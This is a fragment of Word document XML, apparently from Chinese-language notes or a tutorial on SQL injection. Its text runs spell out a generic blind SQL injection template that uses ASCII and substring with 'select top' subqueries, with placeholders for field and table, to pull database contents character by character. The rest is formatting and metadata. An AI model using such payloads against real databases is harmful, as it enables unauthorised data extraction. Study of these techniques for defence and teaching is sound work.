        <w:t xml:space="preserve">and ASCII(substring('(select top 1 </w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t>指定表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> not in (select top 0 </w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:t>指定表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)',1,1))&gt;1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F8D00"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="681F8D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4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3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佳豪</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-25T10:07:11Z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